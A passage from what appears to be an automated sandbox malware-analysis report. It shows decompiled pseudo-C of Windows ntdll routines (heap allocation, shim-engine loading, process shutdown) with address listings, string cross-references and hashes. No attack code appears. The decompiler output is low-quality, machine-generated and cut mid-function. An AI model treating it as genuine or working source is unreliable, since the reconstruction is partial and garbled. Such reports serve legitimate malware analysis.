							if( *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x10)) + 0x2b0)) != _t90) {
								goto L26;
							} else {
								if(_t84 != 0) {
									_t79 = _t90;
									_t82 = _t84[2];
									_t59 = _t82 + ((( *_t84 & 0x0000ffff) >> 1) - 1) * 2;
									while(1) {
										_v1092 = _t79;
										if(_t59 <= _t82) {
											break;
										}
										if( *_t59 == 0x5c) {
											if(_t79 == 0) {
												L24:
												_v1096 = 0x100;
												if(E341A4E50(0xfffffffc,  &_v268,  &_v1096, _t90, _t90, _t90,  &_v1084) >= 0) {
													_t65 = L341B7AD0( &_v268, L"DefaultBrowser_NOPUBLISHERID", 0x1d);
													_t95 = _t95 + 0xc;
													if(_t65 == 0) {
														goto L26;
													}
												}
											} else {
												_t28 = _t59 + 2; // 0x2
												_t82 = _t28;
												_v1096 = _t82;
												if(_t82 != 0) {
													_t66 = _t90;
													_v1084 = _t90;
													do {
														_t86 =  *((intOrPtr*)(_t95 + 0x310 + _t66 * 4));
														_t67 = L341B7AD0(_t82, _t86, _t79);
														_t95 = _t95 + 0xc;
														if(_t67 != 0) {
															_t79 = _v1092;
															goto L23;
														} else {
															_t34 = _t86 + 2; // 0x3414708e
															_t80 = _t34;
															do {
																_t69 =  *_t86;
																_t86 = _t86 + 2;
															} while (_t69 != _t90);
															_t79 = _v1092;
															if(_v1092 == _t86 - _t80 >> 1) {
																goto L26;
															} else {
																goto L23;
															}
														}
														goto L27;
														L23:
														_t82 = _v1096;
														_t66 = _v1084 + 1;
														_v1084 = _t66;
													} while (_t66 < 6);
												}
												goto L24;
											}
										} else {
											_t79 = _t79 + 1;
											_t59 = _t59 - 2;
											continue;
										}
										goto L27;
									}
									goto L24;
								}
							}
						} else {
							_push(_t90);
							_push( &_v1092);
							_push( &_v1076);
							_t81 = 0xfffffffc;
							if(E341A4F11(_t81) < 0 || (_v1092 & 0x00008000) == 0) {
								goto L26;
							} else {
							}
						}
					} else {
						_t74 = L341B7AD0( &_v300, L"SegmentHeap", 0xf);
						_t95 = _t95 + 0xc;
						if(_t74 == 0) {
							goto L26;
						} else {
							goto L3;
						}
					}
				}
				L27:
				_pop(_t85);
				_pop(_t92);
				return L341B4B50(_t90, _t75, _v8 ^ _t95, _t82, _t85, _t92);
			}

0x342186c2
0x342186c2
0x342186ca
0x342186d7
0x342186e6
0x342186e8
0x342186f3
0x342186fe
0x34218700
0x3421870b
0x34218716
0x34218721
0x3421872c
0x3421873a
0x34218892
0x34218892
0x3421889a
0x34218740
0x3421875e
0x3421877f
0x3421877f
0x34218787
0x342187c0
0x00000000
0x342187c6
0x342187c8
0x342187d1
0x342187d3
0x342187d9
0x342187e8
0x342187e8
0x342187ee
0x00000000
0x00000000
0x342187e2
0x342187f4
0x3421884f
0x34218853
0x34218875
0x34218886
0x3421888b
0x34218890
0x00000000
0x00000000
0x34218890
0x342187f6
0x342187f6
0x342187f6
0x342187f9
0x342187ff
0x34218801
0x34218803
0x34218807
0x34218807
0x34218811
0x34218816
0x3421881b
0x34218839
0x00000000
0x3421881d
0x3421881d
0x3421881d
0x34218820
0x34218820
0x34218823
0x34218826
0x3421882d
0x34218835
0x00000000
0x34218837
0x00000000
0x34218837
0x34218835
0x00000000
0x3421883d
0x34218841
0x34218845
0x34218846
0x3421884a
0x34218807
0x00000000
0x342187ff
0x342187e4
0x342187e4
0x342187e5
0x00000000
0x342187e5
0x00000000
0x342187e2
0x00000000
0x342187f0
0x342187c8
0x34218789
0x34218789
0x3421878e
0x34218793
0x34218796
0x3421879e
0x00000000
0x00000000
0x342187b2
0x3421879e
0x34218760
0x3421876f
0x34218774
0x34218779
0x00000000
0x00000000
0x00000000
0x00000000
0x34218779
0x3421875e
0x3421889b
0x342188a4
0x342188a5
0x342188b0

Strings

svchost.exe, xrefs: 342186E8
csrss.exe, xrefs: 34218700
SegmentHeap, xrefs: 34218769
smss.exe, xrefs: 3421870B
lsass.exe, xrefs: 34218721
services.exe, xrefs: 34218716
runtimebroker.exe, xrefs: 342186F3
heapType, xrefs: 3421874B
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 34218750
DefaultBrowser_NOPUBLISHERID, xrefs: 34218880

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 4dbd5eab5eb1c856e5e76d6b9f72651e0aa366b1c5afc39c313b9bc3fff01626
Instruction ID: 7f36c5b58dcfc4936ee9638932b0bfe781cc6938ba86a78270e7777bcafd92ea
Opcode Fuzzy Hash: 4dbd5eab5eb1c856e5e76d6b9f72651e0aa366b1c5afc39c313b9bc3fff01626
Instruction Fuzzy Hash: F451BDB65047199BE321CF18C8C4B9BBBEDEBC4290F41491DFDA9A3240E778D604CB92

Uniqueness

Uniqueness Score: -1.00%

Function 3421F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231
timeCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E3421F0A5(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t87;
				signed int _t89;
				signed int _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				signed char _t105;
				signed int _t106;
				intOrPtr _t108;
				signed int _t109;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t116;
				short* _t134;
				short _t135;
				signed char _t153;
				signed int* _t158;
				short* _t169;
				signed int _t174;
				signed int _t184;
				signed int _t185;
				intOrPtr* _t190;
				void* _t191;

				_push(0x3c);
				_push(0x3424d320);
				L341C7BE4(__ebx, __edi, __esi);
				_t188 = __ecx;
				 *((intOrPtr*)(_t191 - 0x3c)) = __ecx;
				 *((char*)(_t191 - 0x19)) = 0;
				 *(_t191 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *(_t191 - 4) = 0;
					 *(_t191 - 4) = 1;
					_t87 = E34167662("RtlAllocateHeap");
					__eflags = _t87;
					if(_t87 == 0) {
						L46:
						 *(_t191 - 0x24) = 0;
						L47:
						 *(_t191 - 4) = 0;
						 *(_t191 - 4) = 0xfffffffe;
						E3421F3F9();
						_t89 =  *(_t191 - 0x24);
						goto L48;
					}
					_t153 =  *(__ecx + 0x44) | __edx;
					 *(_t191 - 0x2c) = _t153;
					_t183 = _t153 | 0x10000100;
					 *(_t191 - 0x34) = _t153 | 0x10000100;
					_t174 =  *(_t191 + 8);
					__eflags = _t174;
					 *(_t191 - 0x20) = _t174;
					if(_t174 == 0) {
						 *(_t191 - 0x20) = 1;
					}
					_t92 =  *((intOrPtr*)(_t188 + 0x94)) +  *(_t191 - 0x20) &  *(_t188 + 0x98);
					__eflags = _t92 - 0x10;
					if(_t92 < 0x10) {
						_t92 = 0x10;
					}
					_t93 = _t92 + 8;
					 *((intOrPtr*)(_t191 - 0x40)) = _t93;
					__eflags = _t93 - _t174;
					if(_t93 < _t174) {
						L42:
						_t94 =  *[fs:0x30];
						__eflags =  *(_t94 + 0xc);
						if( *(_t94 + 0xc) == 0) {
							_push("HEAP: ");
							L3416B910();
						} else {
							L3416B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t188 + 0x78)));
						L3416B910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t191 + 8));
						goto L46;
					} else {
						__eflags = _t93 -  *((intOrPtr*)(_t188 + 0x78));
						if(_t93 >  *((intOrPtr*)(_t188 + 0x78))) {
							goto L42;
						}
						__eflags = _t153 & 0x00000001;
						if((_t153 & 0x00000001) == 0) {
							E3417FED0( *((intOrPtr*)(_t188 + 0xc8)));
							 *((char*)(_t191 - 0x19)) = 1;
							_t183 =  *(_t191 - 0x2c) | 0x10000101;
							__eflags = _t183;
							 *(_t191 - 0x34) = _t183;
						}
						E34220835(_t188, 0);
						_t184 = E34185D90(_t188, _t188, _t183,  *(_t191 + 8));
						 *(_t191 - 0x24) = _t184;
						_t176 = 1;
						E34220D24(_t188);
						__eflags = _t184;
						if(_t184 == 0) {
							goto L47;
						} else {
							_t185 = _t184 + 0xfffffff8;
							__eflags =  *((char*)(_t185 + 7)) - 5;
							if( *((char*)(_t185 + 7)) == 5) {
								_t185 = _t185 - (( *(_t185 + 6) & 0x000000ff) << 3);
								__eflags = _t185;
							}
							_t158 = _t185;
							 *(_t191 - 0x38) = _t185;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *(_t185 + 3) - (_t158[0] ^ _t158[0] ^  *_t158);
								if(__eflags != 0) {
									_push(_t158);
									_t176 = _t185;
									E3422D646(0, _t188, _t185, _t185, _t188, __eflags);
								}
							}
							__eflags =  *(_t185 + 2) & 0x00000002;
							if(( *(_t185 + 2) & 0x00000002) == 0) {
								_t105 =  *(_t185 + 3);
								 *(_t191 - 0x1a) = _t105;
								_t106 = _t105 & 0x000000ff;
							} else {
								_t134 = L341A3AE9(_t185);
								 *((intOrPtr*)(_t191 - 0x28)) = _t134;
								__eflags =  *(_t188 + 0x40) & 0x08000000;
								if(( *(_t188 + 0x40) & 0x08000000) == 0) {
									 *_t134 = 0;
								} else {
									_t135 = E3419FDB9(1, _t176);
									_t169 =  *((intOrPtr*)(_t191 - 0x28));
									 *_t169 = _t135;
									_t134 = _t169;
								}
								_t45 = _t134 + 2; // 0xffff
								_t106 =  *_t45 & 0x0000ffff;
							}
							 *(_t191 - 0x2c) = _t106;
							 *(_t191 - 0x20) = _t106;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *(_t185 + 3) =  *(_t185 + 2) ^  *(_t185 + 1) ^  *_t185;
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *_t185;
							}
							__eflags =  *(_t188 + 0x40) & 0x20000000;
							if(( *(_t188 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E34220835(_t188, 0);
							}
							__eflags =  *(_t191 - 0x24) -  *0x342647c0; // 0x0
							_t108 =  *[fs:0x30];
							if(__eflags != 0) {
								_t109 =  *(_t108 + 0x68);
								 *(_t191 - 0x44) = _t109;
								__eflags = _t109 & 0x00000800;
								if((_t109 & 0x00000800) == 0) {
									goto L47;
								}
								_t110 =  *(_t191 - 0x2c);
								__eflags = _t110;
								if(_t110 == 0) {
									goto L47;
								}
								__eflags = _t110 -  *0x342647c4; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								__eflags =  *((intOrPtr*)(_t188 + 0x7c)) -  *0x342647c6; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								_t112 =  *[fs:0x30];
								__eflags =  *(_t112 + 0xc);
								if( *(_t112 + 0xc) == 0) {
									_push("HEAP: ");
									L3416B910();
								} else {
									L3416B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E3421823A(_t188,  *(_t191 - 0x20)));
								_push( *(_t191 + 8));
								L3416B910("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t191 - 0x24));
								goto L32;
							} else {
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									L3416B910();
								} else {
									L3416B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t191 + 8));
								L3416B910("Just allocated block at %p for %Ix bytes\n",  *0x342647c0);
								L32:
								_t116 =  *[fs:0x30];
								__eflags =  *((char*)(_t116 + 2));
								if( *((char*)(_t116 + 2)) != 0) {
									 *0x342647a1 = 1;
									 *0x34264100 = 0;
									asm("int3");
									 *0x342647a1 = 0;
								}
								goto L47;
							}
						}
					}
				} else {
					_t190 =  *0x34263748; // 0x0
					 *0x342691e0(__ecx, __edx,  *(_t191 + 8));
					_t89 =  *_t190();
					L48:
					 *[fs:0x0] =  *((intOrPtr*)(_t191 - 0x10));
					return _t89;
				}
			}

0x3421f0a5
0x3421f0a7
0x3421f0ac
0x3421f0b3
0x3421f0b5
0x3421f0ba
0x3421f0bd
0x3421f0c7
0x3421f0e3
0x3421f0e6
0x3421f0f4
0x3421f0f9
0x3421f0fb
0x3421f3d2
0x3421f3d2
0x3421f3d5
0x3421f3d5
0x3421f3d8
0x3421f3df
0x3421f3e4
0x00000000
0x3421f3e4
0x3421f104
0x3421f106
0x3421f10b
0x3421f111
0x3421f114
0x3421f117
0x3421f119
0x3421f11c
0x3421f11e
0x3421f11e
0x3421f12e
0x3421f134
0x3421f137
0x3421f13b
0x3421f13b
0x3421f13c
0x3421f13f
0x3421f142
0x3421f144
0x3421f350
0x3421f350
0x3421f356
0x3421f359
0x3421f378
0x3421f37d
0x3421f35b
0x3421f370
0x3421f375
0x3421f383
0x3421f38e
0x00000000
0x3421f14a
0x3421f14a
0x3421f14d
0x00000000
0x00000000
0x3421f153
0x3421f156
0x3421f15e
0x3421f163
0x3421f16a
0x3421f16a
0x3421f170
0x3421f170
0x3421f177
0x3421f186
0x3421f188
0x3421f18b
0x3421f18f
0x3421f194
0x3421f196
0x00000000
0x3421f19c
0x3421f19c
0x3421f19f
0x3421f1a3
0x3421f1ac
0x3421f1ac
0x3421f1ac
0x3421f1ae
0x3421f1b0
0x3421f1b3
0x3421f1b6
0x3421f1bb
0x3421f1c5
0x3421f1c8
0x3421f1ca
0x3421f1cb
0x3421f1cf
0x3421f1cf
0x3421f1c8
0x3421f1d4
0x3421f1d8
0x3421f208
0x3421f20b
0x3421f20e
0x3421f1da
0x3421f1dc
0x3421f1e1
0x3421f1e6
0x3421f1ed
0x3421f1ff
0x3421f1ef
0x3421f1f0
0x3421f1f5
0x3421f1f8
0x3421f1fb
0x3421f1fb
0x3421f202
0x3421f202
0x3421f202
0x3421f211
0x3421f214
0x3421f218
0x3421f21b
0x3421f227
0x3421f22d
0x3421f22d
0x3421f22d
0x3421f22f
0x3421f236
0x3421f238
0x3421f23c
0x3421f23c
0x3421f244
0x3421f24a
0x3421f250
0x3421f2be
0x3421f2c1
0x3421f2c4
0x3421f2c9
0x00000000
0x00000000
0x3421f2cf
0x3421f2d2
0x3421f2d5
0x00000000
0x00000000
0x3421f2db
0x3421f2e2
0x00000000
0x00000000
0x3421f2ec
0x3421f2f3
0x00000000
0x00000000
0x3421f2f9
0x3421f2ff
0x3421f302
0x3421f321
0x3421f326
0x3421f304
0x3421f319
0x3421f31e
0x3421f337
0x3421f338
0x3421f343
0x00000000
0x3421f252
0x3421f252
0x3421f255
0x3421f274
0x3421f279
0x3421f257
0x3421f26c
0x3421f271
0x3421f27f
0x3421f28d
0x3421f295
0x3421f295
0x3421f29b
0x3421f29f
0x3421f2a5
0x3421f2ac
0x3421f2b2
0x3421f2b3
0x3421f2b3
0x00000000
0x3421f29f
0x3421f250
0x3421f196
0x3421f0c9
0x3421f0ce
0x3421f0d6
0x3421f0dc
0x3421f3e7
0x3421f3ea
0x3421f3f6
0x3421f3f6

APIs

RtlDebugPrintTimes.NTDLL ref: 3421F0D6

Strings

HEAP[%wZ]: , xrefs: 3421F267, 3421F314, 3421F36B
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 3421F33E
HEAP: , xrefs: 3421F274, 3421F321, 3421F378
Just allocated block at %p for %Ix bytes, xrefs: 3421F288
RtlAllocateHeap, xrefs: 3421F0ED
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 3421F389

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: b0b08f77909a62a1e7a4119b215f1ac8842fab374be3874ca29c6edf57301b19
Instruction ID: 570b943efe98c8ac17b7ae94cac49323735cf73f91fba7f7eab9d325889351b1
Opcode Fuzzy Hash: b0b08f77909a62a1e7a4119b215f1ac8842fab374be3874ca29c6edf57301b19
Instruction Fuzzy Hash: 9B91F076900A85DFEB02CFA8C480A9EFBF2EF49314F55804DE855BB252CB7A9951CB14

Uniqueness

Uniqueness Score: -1.00%

Function 3416640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150
timeCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E3416640D(void* __ecx) {
				signed int _v8;
				void* _v12;
				void* _v536;
				void* _v548;
				char _v780;
				char* _v784;
				char _v788;
				char _v792;
				intOrPtr _v804;
				char _v868;
				char* _v872;
				short _v874;
				char _v876;
				void* _v880;
				char _v892;
				void* _v896;
				void* _v900;
				void* _v904;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t48;
				short _t49;
				void* _t52;
				signed char _t61;
				void* _t67;
				intOrPtr _t71;
				void* _t81;
				signed char _t85;
				void* _t99;
				void* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				void* _t109;

				_t108 = (_t106 & 0xfffffff8) - 0x374;
				_v8 =  *0x3426b370 ^ _t108;
				_t48 = 0x16;
				_v876 = _t48;
				_t96 =  &_v876;
				_t49 = 0x18;
				_v874 = _t49;
				_t99 = __ecx;
				_v872 = L"apphelp.dll";
				_v784 =  &_v780;
				_v788 = 0x1000000;
				_v780 = 0;
				_t52 = E34166C11( &_v788,  &_v876, _t109);
				if(_t52 < 0) {
					_t85 =  *0x342637c0; // 0x0
					__eflags = _t85 & 0x00000003;
					if((_t85 & 0x00000003) == 0) {
						L12:
						__eflags = _t85 & 0x00000010;
						L15:
						if(__eflags != 0) {
							asm("int3");
						}
						L6:
						_t53 =  &_v780;
						if( &_v780 != _v784) {
							_t53 = L3416BA80(_v784);
						}
						_pop(_t100);
						_pop(_t102);
						_pop(_t81);
						return L341B4B50(_t53, _t81, _v8 ^ _t108, _t96, _t100, _t102);
					}
					_push(_t52);
					_push("Building shim engine DLL system32 filename failed with status 0x%08lx\n");
					_push(0);
					_push("LdrpInitShimEngine");
					_push(0xa35);
					L11:
					_push("minkernel\\ntdll\\ldrinit.c");
					E341EE692();
					_t85 =  *0x342637c0; // 0x0
					_t108 = _t108 + 0x18;
					goto L12;
				}
				L3418E8A6(0, 0x4001,  &_v868);
				_t96 =  &_v872;
				_t103 = L34166B45( &_v792,  &_v872, 0,  &_v892);
				if(_v804 != 0) {
					E3419E7E0( &_v792, _v868);
				}
				_t112 = _t103;
				if(_t103 < 0) {
					_t61 =  *0x342637c0; // 0x0
					__eflags = _t61 & 0x00000003;
					if((_t61 & 0x00000003) != 0) {
						E341EE692("minkernel\\ntdll\\ldrinit.c", 0xa48, "LdrpInitShimEngine", 0, "Loading the shim engine DLL failed with status 0x%08lx\n", _t103);
						_t61 =  *0x342637c0; // 0x0
						_t108 = _t108 + 0x18;
					}
					__eflags = _t61 & 0x00000010;
					goto L15;
				} else {
					 *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) =  *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) | 0x00000100;
					 *0x34265d64 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0xc)) + 0x18));
					E341A7DF6( *((intOrPtr*)(_t108 + 0xc)));
					E3418D3E1(0,  *((intOrPtr*)(_t108 + 0xc)), _t103);
					_t67 = L34166868( *((intOrPtr*)(_t108 + 0xc)), _t96, _t112);
					if(_t67 < 0) {
						_t85 =  *0x342637c0; // 0x0
						__eflags = _t85 & 0x00000003;
						if((_t85 & 0x00000003) == 0) {
							goto L12;
						}
						_push(_t67);
						_push("Getting the shim engine exports failed with status 0x%08lx\n");
						_push(0);
						_push("LdrpInitShimEngine");
						_push(0xa56);
						goto L11;
					}
					_t104 =  *0x34269208; // 0x0
					_v872 = _t108 + 0x178;
					_v876 = 0x2000000;
					_t96 =  *0x7ffe0330;
					_t71 =  *0x34265b24; // 0x3f22cc8
					asm("ror esi, cl");
					 *0x342691e0( &_v876, _t71 + 0x24, _t99, 0x20);
					if( *(_t104 ^  *0x7ffe0330)() >= 0) {
						E34166565( *((intOrPtr*)(_t108 + 0x14)));
						if( *((intOrPtr*)(_t108 + 0x14)) != _t108 + 0x178) {
							L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t108 + 0x14)));
						}
					}
					goto L6;
				}
			}

0x34166415
0x34166422
0x3416642e
0x3416642f
0x34166434
0x3416643a
0x3416643b
0x34166440
0x34166446
0x3416644e
0x34166458
0x34166460
0x34166465
0x3416646c
0x341c9770
0x341c9776
0x341c9779
0x341c97b3
0x341c97b3
0x341c97dd
0x341c97dd
0x341c97e3
0x341c97e3
0x34166542
0x34166542
0x3416654a
0x341c982b
0x341c982b
0x34166557
0x34166558
0x34166559
0x34166564
0x34166564
0x341c977b
0x341c977c
0x341c9781
0x341c9783
0x341c9788
0x341c97a0
0x341c97a0
0x341c97a5
0x341c97aa
0x341c97b0
0x00000000
0x341c97b0
0x3416647e
0x3416648b
0x34166498
0x3416649e
0x341c97ed
0x341c97ed
0x341664a4
0x341664a6
0x341c97f7
0x341c97fc
0x341c97fe
0x341c97ce
0x341c97d3
0x341c97d8
0x341c97d8
0x341c97db
0x00000000
0x341664ac
0x341664b0
0x341664be
0x341664c3
0x341664cc
0x341664d1
0x341664d8
0x341c9802
0x341c9808
0x341c980b
0x00000000
0x00000000
0x341c978f
0x341c9790
0x341c9795
0x341c9796
0x341c979b
0x00000000
0x341c979b
0x341664de
0x341664eb
0x341664f1
0x341664f9
0x34166507
0x34166510
0x3416651c
0x34166526
0x3416652c
0x3416653c
0x341c981d
0x341c981d
0x3416653c
0x00000000
0x34166526

APIs

RtlDebugPrintTimes.NTDLL ref: 3416651C

Part of subcall function 34166565: RtlDebugPrintTimes.NTDLL ref: 34166614
Part of subcall function 34166565: RtlDebugPrintTimes.NTDLL ref: 3416665F

Strings

minkernel\ntdll\ldrinit.c, xrefs: 341C97A0, 341C97C9
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 341C97B9
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 341C977C
apphelp.dll, xrefs: 34166446
Getting the shim engine exports failed with status 0x%08lx, xrefs: 341C9790
LdrpInitShimEngine, xrefs: 341C9783, 341C9796, 341C97BF

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-204845295
Opcode ID: be4b1b3ff78deeb9f25397401f98b2e9591e9c1d1f88d93f616ed4614415a790
Instruction ID: 2bc9f4cc7878f90dcce1f18be496cf53f30ecf4a7f9568199f6a44ddeccfd27e
Opcode Fuzzy Hash: be4b1b3ff78deeb9f25397401f98b2e9591e9c1d1f88d93f616ed4614415a790
Instruction Fuzzy Hash: 2E51BC72259B00DFE320CF24C8D5E9ABBE9EB94644F004999F996A7260DB34D904CF96

Uniqueness

Uniqueness Score: -1.00%

Function 3419D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E3419D6D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				intOrPtr _t70;
				signed int _t78;
				signed char _t79;
				intOrPtr _t85;
				intOrPtr _t88;
				intOrPtr _t97;
				char _t99;
				signed int _t102;
				signed int _t103;
				signed char _t106;
				signed int _t108;
				signed int _t112;
				intOrPtr _t119;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t127;
				intOrPtr _t129;
				intOrPtr _t134;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t143;

				_push(0x68);
				_push(0x3424c5e8);
				_t68 = L341C7BE4(__ebx, __edi, __esi);
				_t127 =  *[fs:0x18];
				_t97 =  *((intOrPtr*)(_t127 + 0x30));
				if( *0x34265da8 != 0) {
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
					return _t68;
				}
				_t102 =  *(_t97 + 0x10);
				 *((intOrPtr*)(_t141 - 0x30)) =  *((intOrPtr*)(_t102 + 0x40));
				_t70 =  *((intOrPtr*)(_t102 + 0x44));
				 *((intOrPtr*)(_t141 - 0x2c)) = _t70;
				_t103 =  *(_t97 + 0x10);
				if(( *(_t103 + 8) & 0x00000001) == 0) {
					 *((intOrPtr*)(_t141 - 0x2c)) = _t70 + _t103;
				}
				if(( *0x342637c0 & 0x00000005) != 0) {
					_push(_t141 - 0x30);
					E341EE692("minkernel\\ntdll\\ldrinit.c", 0x17f5, "LdrShutdownProcess", 2, "Process 0x%p (%wZ) exiting\n",  *((intOrPtr*)(_t127 + 0x20)));
					_t143 = _t143 + 0x1c;
				}
				_t74 =  *((intOrPtr*)(_t127 + 0x24));
				 *0x34265dac =  *((intOrPtr*)(_t127 + 0x24));
				 *0x34265da8 = 1;
				if( *0x342665f0 != 0) {
					_t137 =  *0x342691f8; // 0x0
					asm("ror esi, cl");
					_t138 = _t137 ^  *0x7ffe0330;
					_t103 = _t138;
					 *0x342691e0(0x20);
					_t74 =  *_t138();
				}
				_t118 =  *((intOrPtr*)(_t127 + 0xfb4));
				if( *((intOrPtr*)(_t127 + 0xfb4)) != 0) {
					_push("true");
					E34174779(_t74, _t118);
				}
				if(( *0x3426391c & 0x00000002) == 0) {
					_t78 =  *(_t97 + 0x10);
					__eflags =  *(_t78 + 8) & 0x40000000;
					_t106 = _t103 & 0xffffff00 | ( *(_t78 + 8) & 0x40000000) == 0x00000000;
					__eflags =  *0x34269234 & 0x00000001;
					_t79 = _t78 & 0xffffff00 | ( *0x34269234 & 0x00000001) == 0x00000000;
					__eflags = _t79 & _t106;
					if((_t79 & _t106) == 0) {
						goto L7;
					}
					 *((char*)(_t141 - 0x19)) = 1;
					_t99 = 0;
					L15:
					_t85 =  *[fs:0x30];
					__eflags =  *0x342668c8;
					if( *0x342668c8 != 0) {
						__eflags =  *((intOrPtr*)(_t85 + 0x18)) - _t99;
						if( *((intOrPtr*)(_t85 + 0x18)) != _t99) {
							E341F0FC8();
							 *0x342668c8 = _t99;
						}
					}
					__eflags =  *((char*)(_t141 - 0x19));
					if( *((char*)(_t141 - 0x19)) == 0) {
						L3419D8F0();
					}
					_t68 = L3419D898();
					goto L19;
				}
				L7:
				_t99 = 0;
				 *((char*)(_t141 - 0x19)) = 0;
				_t129 =  *0x34265da0; // 0x3f4ab60
				L8:
				if(_t129 != 0x34265d9c) {
					_t18 = _t129 - 0x10; // 0x3f4ab50
					_t122 = _t18;
					 *((intOrPtr*)(_t141 - 0x24)) = _t122;
					_t20 = _t129 + 4; // 0x3f4ae20
					_t129 =  *_t20;
					 *((intOrPtr*)(_t141 - 0x20)) = _t129;
					_t22 = _t122 + 0x1c; // 0x76cb5cd0
					_t88 =  *_t22;
					 *((intOrPtr*)(_t141 - 0x28)) = _t88;
					if(_t88 != 0 && ( *(_t122 + 0x34) & 0x00080000) != 0) {
						 *((intOrPtr*)(_t141 - 0x54)) = 0x24;
						 *((intOrPtr*)(_t141 - 0x50)) = 1;
						_t112 = 7;
						memset(_t141 - 0x4c, 0, _t112 << 2);
						_t143 = _t143 + 0xc;
						_t31 = _t122 + 0x48; // 0x0
						E3418DC40(_t141 - 0x54,  *_t31);
						 *((intOrPtr*)(_t141 - 4)) = _t99;
						_t134 =  *((intOrPtr*)(_t141 - 0x24));
						_t157 =  *((intOrPtr*)(_t134 + 0x3a)) - _t99;
						if( *((intOrPtr*)(_t134 + 0x3a)) != _t99) {
							E3418F0A3(_t99, 0, _t134, _t134, 1, __eflags);
						}
						_push(1);
						_push(_t99);
						E3418DCD1(_t99,  *((intOrPtr*)(_t141 - 0x28)),  *((intOrPtr*)(_t134 + 0x18)), _t134, 1, _t157);
						 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
						_t129 =  *((intOrPtr*)(_t141 - 0x20));
						L3419D886();
					}
					goto L8;
				}
				_t119 =  *0x34265b24; // 0x3f22cc8
				__eflags =  *((intOrPtr*)(_t119 + 0x3a)) - _t99;
				if( *((intOrPtr*)(_t119 + 0x3a)) != _t99) {
